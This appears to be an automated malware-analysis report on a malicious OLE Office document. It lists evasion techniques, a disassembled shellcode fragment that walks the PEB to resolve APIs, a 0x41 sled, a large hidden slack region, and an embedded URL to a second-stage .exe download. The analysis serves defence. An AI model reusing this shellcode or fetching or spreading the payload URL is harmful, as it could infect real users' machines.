MALICIOUS
102
Risk Score
Malware Insights
MITRE ATT&CK
T1027 Obfuscated Files or Information
T1497 Virtualization/Sandbox Evasion
The sample exhibits characteristics of a packed executable, including a large amount of slack space and PEB access, which are common evasion techniques. The embedded URL likely points to a secondary payload, such as an executable, which is a typical distribution method for malware.
Heuristics 4
-
PEB access via FS segment (x86) high SC_PEB_ACCESSPEB access via FS segment (x86)
Disassembly
Attempted x86 opcode disassembly00000991 648b4030 mov eax, dword ptr fs:[eax + 0x30] 00000995 8b400c mov eax, dword ptr [eax + 0xc] 00000998 8b401c mov eax, dword ptr [eax + 0x1c] 0000099B 8b7008 mov esi, dword ptr [eax + 8] 0000099E 8b7820 mov edi, dword ptr [eax + 0x20] 000009A1 8b00 mov eax, dword ptr [eax] 000009A3 66837f1800 cmp word ptr [edi + 0x18], 0 000009A8 75f1 jne 0x99b 000009AA 81ec00000000 sub esp, 0 000009B0 89e7 mov edi, esp 000009B2 c7073274910c mov dword ptr [edi], 0xc917432 000009B8 c7470439e27d83 mov dword ptr [edi + 4], 0x837de239 000009BF c747086389d14f mov dword ptr [edi + 8], 0x4fd18963 000009C6 c7470c80d6af9a mov dword ptr [edi + 0xc], 0x9aafd680 000009CD c7471058cb3b21 mov dword ptr [edi + 0x10], 0x213bcb58 000009D4 6a03 push 3 000009D6 58 pop eax 000009D7 89fb mov ebx, edi 000009D9 895750 mov dword ptr [edi + 0x50], edx 000009DC e835ffffff call 0x916 000009E1 48 dec eax 000009E2 75f8 jne 0x9dc 000009E4 89df mov edi, ebx 000009E6 686c6c0000 push 0x6c6c 000009EB 686f6e2e64 push 0x642e6e6f 000009F0 68 .byte 0x68
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 2,097,098 bytes but its declared streams total only 228 bytes — 2,096,870 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
NOP-equivalent sled detected medium SC_NOP_EQUIV_SLEDLong run of 0x41 bytes
Disassembly
Attempted x86 opcode disassembly0000088C 41 inc ecx 0000088D 41 inc ecx 0000088E 41 inc ecx 0000088F 41 inc ecx 00000890 41 inc ecx 00000891 41 inc ecx 00000892 41 inc ecx 00000893 41 inc ecx 00000894 41 inc ecx 00000895 41 inc ecx 00000896 41 inc ecx 00000897 41 inc ecx 00000898 41 inc ecx 00000899 41 inc ecx 0000089A 41 inc ecx 0000089B 41 inc ecx 0000089C 41 inc ecx 0000089D 41 inc ecx 0000089E 41 inc ecx 0000089F 41 inc ecx 000008A0 41 inc ecx 000008A1 41 inc ecx 000008A2 41 inc ecx 000008A3 41 inc ecx 000008A4 41 inc ecx 000008A5 41 inc ecx 000008A6 41 inc ecx 000008A7 41 inc ecx 000008A8 41 inc ecx 000008A9 41 inc ecx 000008AA 41 inc ecx 000008AB 41 inc ecx 000008AC 41 inc ecx 000008AD 41 inc ecx 000008AE 41 inc ecx 000008AF 41 inc ecx 000008B0 41 inc ecx 000008B1 41 inc ecx 000008B2 41 inc ecx 000008B3 41 inc ecx 000008B4 41 inc ecx 000008B5 41 inc ecx 000008B6 41 inc ecx 000008B7 41 inc ecx 000008B8 41 inc ecx 000008B9 41 inc ecx 000008BA 41 inc ecx 000008BB 41 inc ecx 000008BC 41 inc ecx 000008BD 41 inc ecx 000008BE 41 inc ecx 000008BF 41 inc ecx 000008C0 41 inc ecx 000008C1 41 inc ecx 000008C2 41 inc ecx 000008C3 41 inc ecx 000008C4 41 inc ecx 000008C5 41 inc ecx 000008C6 41 inc ecx 000008C7 41 inc ecx 000008C8 41 inc ecx 000008C9 41 inc ecx 000008CA 41 inc ecx 000008CB 41 inc ecx 000008CC 41 inc ecx 000008CD 41 inc ecx 000008CE 41 inc ecx 000008CF 41 inc ecx 000008D0 41 inc ecx 000008D1 41 inc ecx 000008D2 41 inc ecx 000008D3 41 inc ecx 000008D4 41 inc ecx 000008D5 41 inc ecx 000008D6 41 inc ecx 000008D7 41 inc ecx 000008D8 41 inc ecx 000008D9 41 inc ecx 000008DA 41 inc ecx 000008DB 41 inc ecx 000008DC 41 inc ecx 000008DD 41 inc ecx 000008DE 41 inc ecx 000008DF 41 inc ecx 000008E0 41 inc ecx 000008E1 41 inc ecx 000008E2 41 inc ecx 000008E3 41 inc ecx 000008E4 41 inc ecx 000008E5 41 inc ecx 000008E6 41 inc ecx 000008E7 41 inc ecx 000008E8 41 inc ecx 000008E9 41 inc ecx 000008EA 41 inc ecx 000008EB 41 inc ecx
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://a.pomf.hummingbird.moe/kampdj.exe In document text (OLE body)
Open this report in the interactive analyzer, or submit your own file for analysis.